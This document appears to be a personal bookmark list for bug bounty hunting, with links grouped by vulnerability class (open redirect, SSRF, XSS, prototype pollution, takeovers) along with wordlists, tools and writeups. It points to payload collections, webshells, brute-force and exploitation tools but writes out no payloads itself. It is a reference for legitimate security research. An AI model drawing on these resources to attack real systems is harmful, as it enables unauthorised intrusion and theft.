http://www.tecapi.com/public/relative-vulnerability-rating-gui.jsp\n  Huge Mind Map. Lots of resources. Has All Exploits and a lot of good info. https://www.xmind.net/m/Xy7XEW/\n  Collaborative Mindmaps - Collaborative Mind Mapping \n\nMobile\n  https://github.com/skateforever/pentest-scripts/tree/main/mobile\n  https://www.veracode.com/blog/2010/12/mobile-app-top-10-list \n  \nMootools\n  https://github.com/BlackFan/client-side-prototype-pollution/blob/master/pp/mootools-more.md\n  mootools 1.4.5 vuln \n    https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-31812/summary\n    Vulnerable Line https://github.com/vsviridov/mootools-node/commit/0fcc500aa1be356bc8745b322e8182f38ec8f0a0#diff-c4d2ea9c35bf14dd01cf28b174dba68fca9d2d9a2ae4b63d48ee496d7e9deedbR360-R367 \n    poc https://snyk.io/test/npm/mootools/1.4.5\nNmap\n  https://tecadmin.net/scanning-open-ports-with-nmap/inif\n  nmap pwn https://gist.github.com/BU9D4DDY/3e31890ae407e7c41a00f3715d00c5d7\n\nNodejs hacking\nhttps://github.com/zactly/handouts/blob/master/node_js_generic_checks.md\n\nOneliners\n    automate prototype polution https://twitter.com/R0X4R/status/1402906185301323776\n    https://github.com/D4Vinci/One-Lin3rt\n\n  https://github.com/Excloudx6/Elsfa7110-Oneliner-bughunting\n  https://hackingblogs.com/bug-bounty-builder-project-tool-use/#ONE-LINERRECONfor_FUZZ_XSS\n  https://github.com/KingOfBugbounty/KingOfBugBountyTips/compare/master...halencarjunior:KingOfBugBountyTips:master\n  https://www.youtube.com/watch?v=ZcG8ARatgs0&amp;t=467s\n  https://giters.com/okaayfine/oneliner-bugbounty\n  https://twitter.com/ofjaaah/status/1532581839344394241\n  https://gist.github.com/cyberheartmi9/c993542044fdc45834837c3f88484a63\n  https://github.com/trimstray/the-book-of-secret-knowledge\n\nOpen Redirects\nhttps://github.com/tomnomnom/meg/compare/master...1ndianl33t:meg:master\nhttps://www.infosecmatter.com/bug-bounty-tips-1/#5-top-25-open-redirect-dorks\nhttp://www.thespanner.co.uk/2014/03/21/rpo/\nhttps://nostarch.com/download/samples/RealWorldBugHunting_Ch02_Sample.pdf\nhttps://i.blackhat.com/asia-19/Fri-March-29/bh-asia-Wang-Make-Redirection-Evil-Again-wp.pdf\nhttps://devcraft.io/2020/10/19/github-gist-account-takeover.html\nhttps://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-an-open-redirecthttps://blog.intigriti.com/hackademy/open-redirect/\nhttp request smugglin open redorect defparam https://www.youtube.com/watch?v=3tpnuzFLU8g\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/understanding-and-discovering-open-redirect-vulnerabilities/\nhttps://corneacristian.medium.com/top-25-open-redirect-bug-bounty-reports-5ffe11788794\nhttps://www.youtube.com/watch?v=4Jk_I-cw4WE\nhttps://www.youtube.com/watch?v=grkMW56WX2E\n  https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Open%20Redirect/Intruder/open_redirect_wwwist.txt\n  https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Open%20Redirect/Intruder/openredirects.txt\n  https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Open%20Redirect/Intruder/Open-Redirect-payloads.txt\n  https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html\n  https://github.com/AnLoMinus/Bug-Bounty/blob/2d654a0a62c1194564aa841745c171c4b1374252/Checklist/Web%20App/Upload%20Function.md\nhttps://github.com/Excloudx6/open-redirect-payload-list\n * [Learn with @DarkLotusKDB: Recon with Shodan &amp; Spyse,XSS, Bypass OpenRedirects, SSRF, BugBunty Bot!!!](https://www.youtube.com/watch?v=66HqaFCF4Kk)\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect\n  https://web.archive.org/web/20201130145910/https://github.com/ptswarm/ptswarm-twitter/blob/main/2020-11-30-open-redirect-params.txt\nhttps://giters.com/okaayfine/oneliner-bugbounty#open-redirect\nhttps://infosecwriteups.com/bugbounty-linkedln-how-i-was-able-to-bypass-open-redirection-protection-2e143eb36941\nTnom and ori https://youtu.be/SYExiynPEKM?t=2630\n\nOwasp Top 10 (2021) https://cwe.mitre.org/data/definitions/1344.html\nParams\n  More Silent wheb running https://github.com/0xecho/parameth\n  Normal Branch https://github.com/maK-/parameth\n  Docker support https://github.com/Shaked/parameth\n  \nParameter Tampering - \n  http://www.tecapi.com/public/rvr-view-attack-vector-gui.jsp?antiCsrfToken=null&amp;attackVectorId=57\n\nPayloads / POCs\n    https://github.com/knownsec/pocsuite3\nhttps://github.com/pranav77/XSS-using-SVG-file\n  https://github.com/Excloudx6/Public/tree/master/payloads\n  https://github.com/sh377c0d3/Payloads/fork\n  https://github.com/RootUp/PersonalStuff\n  https://github.com/swisskyrepo/PayloadsAllTheThings \n  https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open\n  https://portswigger.net/research/top-10-web-hacking-techniques-of-2019\n  https://portswigger.net/research/top-10-web-hacking-techniques-of-2020-nominations-open\n  https://portswigger.net/research/top-10-web-hacking-techniques-of-2020\n  https://portswigger.net/research/top-10-web-hacking-techniques-of-2021-nominations-open\n  https://portswigger.net/research/top-10-web-hacking-techniques-of-2021\n  https://portswigger.net/research/top-10-web-hacking-techniques\n  https://portswigger.net/research/so-you-want-to-be-a-web-security-researcher#forgottenknowledge\n\nPOC Videos\n  https://repo.telematika.org/project/bminossi_allvideopocsfromhackerone/\n  https://github.com/zeroc00I/AllVideoPocsFromHackerOne\n\nPassword Cracking\n  https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-dg.pdf\n\nPeople \ntnom interview https://gist.github.com/ruevaughn/00638360841b2bec94149080c4f04f28\nAshar Jahvid https://twitter.com/soaj1664ashar\n\nProducts / Services \nTobuy https://order.shareit.com/cart/view | https://tryhackme.com/why-subscribe | https://findomain.app/#Pricing | https://github.com/Excloudx6/InfoSec-Black-Friday | HAKLUKE RECOMENDS https://securitytrails.com/corp/osint-toolkit?referral_code=LLDAK0F80M\n\n\nProtype Pollution\n  automate https://twitter.com/R0X4R/status/1402906185301323776\n  https://www.kitploit.com/2021/09/plution-prototype-pollution-scanner.html\n  https://github.com/dwisiswant0/ppfuzz?tag=v1.0.0\n  https://github.com/kosmosec/proto-find\n  https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#prototype-pollution\n  https://github.com/BlackFan/client-side-prototype-pollution\n  https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/\n  https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf\nhttps://www.youtube.com/watch?v=Gv1nK6Wj8qM&amp;t=1558s\nppmap \n  https://blog.intigriti.com/2021/07/14/bug-bytes-131-credential-stuffing-in-bug-bounty-hijacking-shortlinks-hacker-shows/\n  https://www.geeksforgeeks.org/ppmap-a-scanner-or-exploitation-tool-written-in-go/\n  https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution\nPrototype polution Tools\n  https://github.com/msrkp/PPScan\n\n\n\nPython\nhttps://hackernoon.com/10-common-security-gotchas-in-python-and-how-to-avoid-them-e19fbe265e03?utm_source=pocket-ff-recs\n\nRails\n  https://github.com/zactly/handouts/blob/master/oss_apps.md\n  https://github.com/zactly/handouts/blob/master/materials.md\n  https://github.com/gramantin/awesome-rails#apps-made-with-rails\n  Mass Assignment https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html\n  https://code.tutsplus.com/tutorials/mass-assignment-rails-and-you--net-31695\n  https://www.cloudbees.com/blog/preproduction-checklist-for-a-rails-app?utm_source=rubyweekly&amp;utm_medium=email\n  https://youtu.be/CIhHpkybYsY?t=1171\n  https://github.com/zactly/handouts/find/master\n  https://github.com/zactly/handouts/blob/master/conferences/virtual-appsecday-2020/skea_rails_routes.md\n  \n \nRecon\n  https://github.com/003random/003Recon\n  https://raw.githubusercontent.com/anshumanbh/domain/master/enumall.py\n  Reconmap GUI Website SaaS https://demo.reconmap.com/login\n  https://github.com/0xbharath/assets-from-spf\n  https://mavericknerd.github.io/knowledgebase/BugBountyRecon/\n  https://www.bugbountyhunter.com/methodology/zseanos-methodology.pdf   \n  https://ulir.ul.ie/bitstream/handle/10344/8278/Nuseibeh_2019_Text.pdf?sequence=2\n  https://github.com/janmasarik/resolvers\n  https://github.com/janmasarik/resolvers/pull/31/files\n\nResolvers\n  https://github.com/janmasarik/resolvers/pull/31/files\n  https://github.com/janmasarik/resolvers\n\n\nReporting\n  https://cheatsheetseries.owasp.org/cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html\n\nReflected File Downloads\n Reflected File Download - A New Web Attack Vector https://www.youtube.com/watch?v=dl1BJUNk8V4\n https://blog.davidvassallo.me/2014/11/02/practical-reflected-file-download-and-jsonp/\nhttps://drive.google.com/file/d/0B0KLoHg_gR_XQnV4RVhlNl96MHM/view?resourcekey=0-NV7cTUTB48bltMEddlULLg\nhttps://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf\nhttps://www.davidsopas.com/reflected-file-download-cheat-sheet/\n\nRegexp\n  Regexp Basics https://www.youtube.com/watch?v=KJG1dETacLI\n  https://regexr.com/\n\nResources\n  https://portswigger.net/research/web-cache-entanglement\n  https://github.com/AnLoMinus/Bug-Bounty\n  https://github.com/ngalongc/bug-bounty-reference\n  https://www.youtube.com/c/krypt0muxbugbounty\n  https://github.com/OWASP/www-chapter-czech-republic/blob/master/slides/Getting_Started_with_Bug_Bounty.pdf\n  https://github.com/OWASP/www-chapter-czech-republic/blob/master/slides/Hacking_101.pdf\n  https://github.com/OWASP/www-chapter-czech-republic/blob/master/slides/Adela_Hanikova_All_roads_lead_to_domain_admin.pdf\n  https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE\n  Really good bug bounty playlist https://www.youtube.com/watch?v=FeXloh12Mnw&amp;list=PLlrnAg4kKF3r26OIyfoYQQ-YqySE3fyE_&amp;index=2\n  When looking for something ot hack https://web.archive.org/web/20210420062735/https://help.intrigue.io/reference/intrigue-core-api-endpoints\n  The 5 Hacking NewsLetter 107 - https://pentester.land/newsletter/2020/05/27/the-5-hacking-newsletter-107.html\n  Cloud Metadata - https://gist.github.com/rudSarkar/39f821249bf0d38093cafbfd23bc33ee | https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb\n  Megathread https://twitter.com/ITSecurityguard/status/1519272305729458176\n  Reset Passwprd https://docs.google.com/presentation/d/1QzBl3k3n2q44ULyfZgr_gPZexj8nF5vD8JrS5AUJRbs/edit#slide=id.gb5aea10a86_0_167\n  Bug Bounty Google Doc https://docs.google.com/presentation/d/1o7GWUOYwcd3uMwLBRG9UzARYCvfuX3VKUHfoPu38t78/edit\n  Bug Bounty Udemy Courses Tip https://twitter.com/ITSecurityguard/status/1519272305729458176 \n  https://github.com/carlospolop/PEASS-ng \n  Saturday Night Bug Bounty Bytes w/ Ch1-R0n1n  https://www.youtube.com/watch?v=xx5fF7i-dCQ\n  Nicolas Gr\u00e9goire - Hunting for Top Bounties  https://www.youtube.com/watch?v=mQjTgDuLsp4\n  Hacktify Playlist to learn hacking https://www.youtube.com/watch?v=NBCrlRqX2AY&amp;list=RDCMUCS82DNnKOhXHcGKxGzQvNSQ&amp;start_radio=1&amp;rv=NBCrlRqX2AY&amp;t=0\n  \nRNG http://www.math.sci.hiroshima-u.ac.jp/m-mat/MT/ARTICLES/earticles.html  \n\nRPO (Relative Path overide) Gadgets \n  https://blog.innerht.ml/rpo-gadgets/\n  https://www2018.thewebconf.org/proceedings/\n  https://blog.acolyer.org/2018/05/28/large-scale-analysis-of-style-injection-by-relative-path-overwrite/\n  https://www.nds.rub.de/media/emma/veroeffentlichungen/2012/08/16/scriptlessAttacks-ccs2012.pdf\n  https://portswigger.net/research/detecting-and-exploiting-path-relative-stylesheet-import-prssi-vulnerabilities\ninurl:/.well-known/security ext:txt -hackerone -bugcrowd -synack -openbugbount\n\nSAML\nhttps://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/\nhttps://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final91.pdf\nhttps://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/\n\nScanners\n  2020_3452\nhttps://www.zoomeye.org/\nhttps://searchcode.com/\nhttps://fullhunt.io/\nhttps://github.com/RustScan/RustScan\nhttps://github.com/knassar702/scant3r\n\nS3 buckets \n  https://github.com/sa7mon/S3Scanner\n   Dumping S3 Buckets | Exploiting S3 Bucket Misconfigurations https://www.youtube.com/watch?v=ITSZ8743MUk\n   https://support.cloudflare.com/hc/en-us/articles/360037983412-Configuring-an-Amazon-Web-Services-static-site-to-use-Cloudflare\n\nSecond Order Takeovers\n  Shubbs Talking about it in his 5 years of hacking talk. Good. https://youtu.be/iG7-c0YbhbM?t=1472\n\nSelf Hosting \n  https://honoki.net/2021/07/11/wilson-cloud-respwnder/\n  Shodan like nmap results parser (https://github.com/shivammehta007/ScanX) PBNJ(http://pbnj.sourceforge.net/) (A suite of tools to monitor change in a network over time) store NMAP Results in a database to monitor changes on a network over time and then conducts historical analysis to identify new hosts - \n\nScripts\n  LFI https://web.archive.org/web/20100228162410/http://pastie.org/840199\n  https://github.com/killswitch-GUI/PenTesting-Scripts\n\nSession Poisoning - https://en.wikipedia.org/wiki/Session_poisoning \n https://github.com/t1m4/ptl_lab\n \nSetup\n  Bug Bounty Tools Setup - https://github.com/oliveira-andre/bug_bounty_tools\n  Redherd - https://redherd.readthedocs.io/en/latest/ | https://www.youtube.com/channel/UCYSM51oldVsryhZxGdB3hXA\n\nShells\n  https://github.com/tennc/webshell/blob/master/README_EN.md\n\nSmart Contracts\n  https://github.com/SecurityInnovation/Smart-Contract-CTF\n\nSSRF\n  SSRF HTTP Bypass List https://pastebin.com/YbsKrMpf\n SSRF - Practical  by Hacktify https://www.youtube.com/watch?v=NBCrlRqX2AY\nhttps://reconshell.com/jira-mobile-ssrf-exploit/\nhttps://gowthams.gitbook.io/bughunter-handbook/list-of-vulnerabilities-bugs/ssrf\n\n\nSubdomain Takeovers\n  https://github.com/mhmdiaa/tko-subs\n  https://github.com/mhmdiaa/second-order\nhttps://0xpatrik.com/subdomain-takeover-ns/\nhttps://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/\nhttps://www.hackerone.com/application-security/guide-subdomain-takeovers\nhttps://medium.com/@thebuckhacker/how-to-do-55-000-subdomain-takeover-in-a-blink-of-an-eye-a94954c3fc75\nhttps://import.cdn.thinkific.com/359809/courses/1386931/locomotivesubdomaintakeover-210608-154821.yamll\nhttps://github.com/buckhacker/SubDomainTakeoverTools\ngithub.com/lukasikic/subzy \n    -&gt; https://gist.githubusercontent.com/ruevaughn/91d3369fdf0d93b0bdc6662c771cb7ae/raw/79e07b315e465bae1f003ec8fd40fcf5471b223b/fingerprints.json\ngithub.com/mhmdiaa/second-order\n\nSubmitting a report\nhttps://about.gitlab.com/blog/2020/09/28/top-tips-for-better-bug-bounty-reports-and-a-hacker-contest/\n\nSQL INjection\nhttps://www.cloudflare.com/learning/security/threats/sql-injection/\n\nShodan\n  Awesome Shodan Queries https://github.com/jakejarvis/awesome-shodan-queries\n  Shodan Dorks https://twitter.com/0xhunster/status/1548382647759491074/photo/1\n  Shodan CVE Dorks Kathan https://kathan19.gitbook.io/howtohunt/sensitive-info-leaks/shodan_cve_dorks\n  https://carbon.now.sh/6nEp25xrtuu53L6aquU4\n  https://twitter.com/kotylevskiy/status/1551926067908182018/photo/1\nStatus Codes\n  Web status codes https://requests.readthedocs.io/en/latest/api/#status-code-lookup\n  \nSQL Injection\nhttps://github.com/ladecruze/Exploits/blob/master/sqlexploit.js\n  https://book.hacktricks.xyz/pentesting-web/sql-injection\n  (at the bottom of the page, the image and text for 2 sqli x-forwarded-for tips) https://medium.com/pentesternepal/access-control-worth-2000-everyone-missed-this-idor-access-control-between-two-admins-9745eaf15d21\n  https://github.com/0xEval/sql2shell\n  \nSource Code Analysis\n  https://twitter.com/dhakal_ananda/status/1544574015779606529\n\nTakeovers\n  https://github.com/musana/mx-takeover\n  \nTiming Attacks\nTime Attacks http://www.tecapi.com/public/relative-vulnerability-rating-gui.jsp?antiCsrfToken=null&amp;filterCategory=9\n\nTips\n  Parse Github URls https://github.com/ruevaughn/git-url-parse\n  Randomize IPs https://gist.github.com/yehgdotnet/27114d4bb5b28ec093e6dd36e329c389\n\n  Find IP Address behind CDN\n    \t\thttps://github.com/mandatoryprogrammer/cloudflare_enum\n    https://infosecwriteups.com/finding-the-origin-ip-behind-cdns-37cd18d5275\n    https://zdresearch.com/finding-the-origin-ip-behind-cdns/\n    https://twitter.com/HolyBugx/status/1343156549162852352?s=20 \n  Test Shodan Queries https://app.netlas.io/responses/\n  https://bbinfosec.medium.com/collection-of-bug-bounty-tip-will-be-updated-daily-605911cfa248\n  https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/bugbountytips.md\n  King of Bug Bounty Tips - https://github.com/KingOfBugbounty/KingOfBugBountyTips\n  https://abhinavprasad47.github.io/bugbounty-starter-notes/\n  https://www.google.com/search?tbm=bks&amp;q=recon-ng\n  gh dork: https://github.com/topics/one-liners\n  Sqlmap tip - https://youtu.be/rVu0GUjic_g?t=2246\n  Eval command and security issues https://mywiki.wooledge.org/BashFAQ/048\n  \ud83c\udf1f Find company's owned domains (company.*) with these #googledorks: | https://twitter.com/nil0x42/status/1533094473067995137 \n  https://redhuntlabs.com/nvadr\nTodo\n    read https://docs.github.com/en/code-security/secret-scanning/about-secret-scanning\n      https://tillsongalloway.com/finding-sensitive-information-on-github/\nTODO: Make a worldist from these Amazon Cognito API actions GetUser etc https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_AdminGetUser.html\n\n\nTools\n  https://github.com/ladecruze/Subdorker/fork\n   Brute Force Tomcat https://github.com/Excloudx6/tomcter\n  Code Snippets\n    https://carbon.now.sh/snippets\n  HTML Tools (CSV To HTML, Regexpal, 50+ tools) \n    https://www.cleancss.com/join.php\n  \n\n  Arjun                 \n    https://github.com/s0md3v/Arjun/wiki/Usage#scan-a-single-url  \n  crobat                    \n    https://www.onsecurity.io/blog/how-i-made-rapid7s-project-sonar-searchable/\n  Dom Invader               \n    https://www.youtube.com/watch?v=GeqVMOUugqY\n  ffuf                      \n    https://mikekitckchan.medium.com/holy-ffuf-a-beginner-guide-to-fuzz-with-ffuf-4bc6a66b5391 | https://thexssrat.medium.com/what-the-fuzz-the-truth-behind-content-discovery-77cd0c0756e7\n  gf       \n    Automate GF and gau https://gist.github.com/BU9D4DDY/eea5f7580577d9bf5d009ce923bac4fe\n    https://rengine.wiki/usage/tool_conf/ \n    https://github.com/1ndianl33t/Gf-Patterns \n    https://github.com/halencarjunior/BugBuntu/wiki/Installing-Gf-Patterns \n    https://github.com/NitinYadav00/gf-patterns/fork \n    https://twitter.com/sratarun/status/1361209626478276610 \n    MORE GF TEMPLATES https://github.com/lutfumertceylan/top25-parameter/releases/tag/v1.0.7 \n    https://github.com/tomnomnom/gf/compare/master...pry0cc:jf:master | \n    https://github.com/ResistanceIsUseless/gf | \n    https://github.com/tomnomnom/gf/compare/master...medbsq:gf:master | \n    https://github.com/mrofisr/gf-patterns\n    \n  gee                       \n    Similar to Tee. More Functionality. https://github.com/hahwul/gee\n    Gee Tips https://twitter.com/hahwul/status/1360495560843689989\n  FFMPEG-AVI-m3u-xbin       - https://github.com/Excloudx6/ffmpeg-avi-m3u-xbin\n  metabigor v2              - Metabigor https://twitter.com/j3ssiejjj/status/1528687407587299330/photo/1\n  pywhat -- Identify anything. pyWhat easily lets you identify PI from pcap files\n    https://github.com/bee-san/pyWhat/fork\n  recon-ng  https://raw.githubusercontent.com/anshumanbh/domain/master/enumall.py\n  SimpleApachePathTraversal - https://github.com/MrCl0wnLab/SimplesApachePathTraversal\n  Source2Url                - \n  \n  Tmux \n    tmux or screen https://youtu.be/a8LaNydbJyA?t=6406\n\n  \n  Tracy\n    https://newsroom.nccgroup.com/\n    https://github.com/nccgroup/tracy/blob/master/src/js/database-worker.js\n    https://github.com/nccgroup/tracy\n  \n  UrlEncode/Decode\n    https://www.w3schools.com/tags/ref_urlencode.ASP\n    https://network-tools.com/url-encode/\n    https://www.url-encode-decode.com/\n\nVulnerable Things\n  https://github.com/kiwicom/xssable\n   https://github.com/janmasarik/dumb-password-rules\n https://github.com/duffn/dumb-password-rules/fork\n \n \n WhatWeb                   - https://github.com/urbanadventurer/WhatWeb\n  WFUZZ                     - https://book.hacktricks.xyz/pentesting-web/web-tool-wfuzz\nwwwwwww\nahttps://useragent.me/\n\nWordlists\nhttps://gist.github.com/random-robbie/0f9d24a7b3c7268ee0c1ecdbe280611b\n  http://web.mit.edu/~mkgray/jik/src/Attic/kerberos_password_hacker/allwords\n  https://web.archive.org/web/20201130145910/https://github.com/ptswarm/ptswarm-twitter/blob/main/2020-11-30-open-redirect-params.txt\n  https://github.com/mhmdiaa/chronos\n  https://github.com/d4rckh/gorilla\n  https://github.com/jim3ma/crunch\n  https://github.com/the-xentropy/samlists/fork\n  https://github.com/AyProductions-Team/NEXTdependencydownloader/blob/588fa54b77743f808feec88070a4a0c76ac7c993/bin/Debug/net6.0-windows/DependencyDownloader.exe.WebView2/EBWebView/ZxcvbnData/3.0.0.0/passwords.txt\n  https://gist.github.com/random-robbie/c9671939d029848df38e06c5383e6395\n  Common Config Files by Tomnomnom   https://github.com/tomnomnom/meg/blob/master/lists/configfiles\n  Short Wordlist by Tomnomnom https://gist.github.com/tomnomnom/57af04c3422aac8c6f04451a4c1daa51\n  https://github.com/giteshnxtlvl/cook\n  https://imgur.com/user/silverblack1111/New%20Folder\n  https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056\n  https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/iam_user_enum/default-word-list.txt\n  https://github.com/koaj/aws-s3-bucket-wordlist\n  https://github.com/Karanxa/Bug-Bounty-Wordlists\n  FUZZ.txt good -https://gist.github.com/m4ll0k/50efec5f04179b107c9d7597eec7d23c\n  https://gist.github.com/m4ll0k/https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d\n  Stream: Creating Target Specific Wordlist!!  https://www.youtube.com/watch?v=AF-zp6DROTs\n  API Endpoints https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d\n  https://bendtheory.medium.com/finding-and-exploiting-unintended-functionality-in-main-web-app-apis-6eca3ef000af\n  https://wordlists.assetnote.io/\n  https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056\n  https://github.com/six2dez/OneListForAll/blob/main/onelistforallmicro.txt\n  https://gist.github.com/miguelmota/706ebaeb661e246e1b682c400d49d1c9\n  https://github.com/ghostlulzhacks/wordlist/blob/master/directory-brute-wordlist.txt\n  to harvest https://youtu.be/YO3ldj4jkJk?t=275\n  Common Bucket Names https://github.com/buckhacker/buckhacker/blob/master/resources/common-bucket-names.txt\n  https://portswigger.net/web-security/authentication/auth-lab-passwords\n  https://portswigger.net/web-security/authentication/auth-lab-usernames\n  https://github.com/SmeegeSec/SmeegeScrape\n  make a wl from js https://gist.github.com/seqrity/d67608eb6372cd6f455bfeeefa77b9c2\n  Who what where when tomnomnom - https://www.youtube.com/watch?v=W4_QCSIujQ4\n  https://pentestbook.six2dez.com/recon/webs-recon Wordlist Gen\n  https://github.com/giteshnxtlvl/cook\n  https://gitlab.com/kalilinux/packages/amass/-/tree/91a5313226ab9ebd4ecbad40622584dd6f3f7cd5/wordlists Wordlists\n\n\n  \nWriteups\n  https://github.com/kh4sh3i/bug-bounty-writeups\n  securityforeveryone.com/scan-repository\n  2022-07-15 Exploiting Arbitrary Object Instantiations in PHP without Custom Classes  https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/\n  https://github.com/fardeen-ahmed/Bug-bounty-Writeups\n  https://github.com/devanshbatham/Awesome-Bugbounty-Writeups\n  https://twitter.com/ITSecurityguard/status/1519272305729458176\n  https://github.com/ngalongc/bug-bounty-reference\n  \n  https://github.com/djadmin/awesome-bug-bounty\n  https://ysamm.com/#\n  https://tarekbouali.com/posts/how-i-hacked-one-of-the-biggest-airlines-group-of-the-world/\n  https://github.com/jaiswalakshansh/Facebook-BugBounty-Writeups\n  https://infosecwriteups.com/intro-to-bug-bounty-automation-tool-chaining-with-bash-13e11348016f\n  https://hacklido.com/u/excloudx\n  https://subscription.packtpub.com/book/ssnetworking-and-servers/9781788626897/7/ch07lvl1sec47/example\n  https://subscription.packtpub.com/owned\n  https://id.bugbountyhub.com/auth/realms/bugbountyhub/login-actions/authenticate?execution=a484e1a7-bc42-472b-a339-15be49996b14&amp;client_id=prod-platform&amp;tab_id=MivkVulj_p8\n  https://prashantbhatkal2000.medium.com/svg-based-stored-xss-ee6e9b240dee\n  https://github.com/phlmox/public-reports/blob/main/hackerone-one-million-reports\n  https://footstep.ninja/posts/\n  https://twitter.com/omespino/status/1489310300708900868/photo/\n  https://github.com/phlmox/public-reports\n  https://blog.assetnote.io/2020/09/15/hacking-on-bug-bounties-for-four-years/\n  https://discord.com/channels/772850979955671103/772854181433573398/895230570366402590 Hacking Articles\n\nVhosts\n  https://github.com/Shaked/vhost-finder\n  Vhost Discovery https://github.com/projectdiscovery/tlsx#sancn-probe\n\nVPS\nhttps://github.com/bbhunter/pentest-scripts/blob/main/useful/get-tools.sh\nhttps://github.com/crawlab-team/crawlab\n  https://github.com/righettod/toolbox-pentest-web\n  google cloud official repos https://github.com/googleapis/google-cloud-ruby\n  google cloud repos https://github.com/orgs/4ARMED/repositories\n  Certifcate install   https://github.com/anshumanbh/terraform-burp-collaborator#using-a-proper-tls-certificate\n  https://github.com/orgs/4ARMED/repositories\n  Teraform Burp Colab server https://github.com/anshumanbh/terraform-burp-collaborator\n  Setup script for Regon-ng  and altdns https://github.com/jhaddix/domain\n  https://github.com/AntSwordProject/antSword\n  https://github.com/janmasarik/resolvers/blob/master/.github/workflows/main.yml\n  https://github.com/pry0cc/axiom/tree/master/images/provisioners\n  https://github.com/janmasarik/resolvers\n  Assetnote Setup and Installation   https://gist.github.com/sz3n/1fdf2f871a10d4e9180757afc8fd80e2\n  https://demo.ezxss.com/manage/dashboard\n  https://github.com/ssl/ezXSS/wiki/Installation\n  https://honoki.net/2021/07/11/wilson-cloud-respwnder/\n  https://github.com/ruevaughn/assetnote\n  https://github.com/robre/jsmon\n  Host and Deploy Assetnote https://gist.github.com/BU9D4DDY/9e023d0fae3314273302ae895ae7c5ed\n  vps_install.sh by Rajchowdhury420 https://gist.github.com/Rajchowdhury420/24fa500ebc4edbb2018860f85f93b8cf\n  https://hackingblogs.com/bug-bounty-builder-project-tool-use/\n  Beats - Lightweight shippers for Elasticsearch &amp; Logstash \n  https://github.com/nicolargo/glances\n  https://github.com/intrigueio/intrigue-core/wiki/Setting-up-a-Development-Environment-%28on-Ubuntu%2C-Kali%2C-Debian%29\n  https://www.udemy.com/course/learn-website-hacking-penetration-testing-from-scratch/learn/lecture/5878090?start=0#overview\n  Pt a website onlne https://www.youtube.com/watch?v=NQP89ish9t8\n  https://www.trenchesofit.com/2021/06/14/bug-bounty-vps-build/\n  https://github.com/intrigueio/intrigue-core/wiki/Setting-up-a-Development-Environment-%28on-Ubuntu%2C-Kali%2C-Debian%29\n  https://github.com/AlexisAhmed/BugBountyToolkit &lt;-- docker \n\nWhitepapers\nhttps://github.com/zactly/handouts/tree/master/conferences\n\nxss\nhttps://github.com/kiwicom/xssable\nhttps://twitter.com/soaj1664ashar\n  https://github.com/pranav77/XSS-using-SVG-file\n  https://www.openbugbounty.org/blog/devl00p/top-100-xss-dorks/\n  xss - https://threadreaderapp.com/thread/1508406052663934979.html\n  https://google-gruyere.appspot.com/\n  https://0x1.gitlab.io/web-security/Weaponised-XSS-Payloads/\n  https://infosecwriteups.com/weaponizing-reflected-xss-to-account-takeover-ae8aeea7aca3\n  https://hakluke.medium.com/upgrade-xss-from-medium-to-critical-cb96597b6cc4\n  https://github.com/hakluke/weaponised-XSS-payloads\n  https://medium.com/redteam/weaponising-angularjs-bypasses-4e59790a730a\n  https://github.com/dwisiswant0/findom-xss\n  https://www.secureideas.com/blog/2018/12/twelve-days-of-xssmas.html\n  https://www.geeksforgeeks.org/findom-xss-fast-dom-based-xss-vulnerability-scanner/?ref=rp\n  https://thexssrat.podia.com/free-labs\n  https://github.com/topics/xss\n  https://twitter.com/ofjaaah/status/1504932805431767046\n  https://portswigger.net/research/new-xss-vectors\n  https://medium.com/bugbountywriteup/how-i-was-able-to-find-50-cross-site-scripting-xss-security-vulnerabilities-on-bugcrowd-public-ba33db2b0ab1\n  https://github.com/takshal/freq\n  https://bytemeta.vip/index.php/@takshal\n  https://github.com/takshal/freq/pull/2/commits/ca176eee65889530b4896d782419edd0e4325713\n  https://www.kitploit.com/2018/05/xss-payload-list-cross-site-scripting.html\n  What is the best method to use dalfox?? https://attacker-codeninja.github.io/2021-09-09-portswigger-notes-on-host-header-attack/\n  https://github.sre.pub/topics/xss-scanners\n  https://medium.com/@skavans_/the-unobvious-about-xss-and-html-encoding-4e0d536a35d9\n  Al the ways you can alert js -&gt; https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309\n  https://github.com/wisec/domxsswiki/wiki\n  https://github.sre.pub/topics/xss-scanners\n  https://owasp.org/www-community/attacks/xss/\n  Moving beyond alert()xss https://av.tib.eu/media/49191\n  https://unescape-room.jobertabma.nl/\n  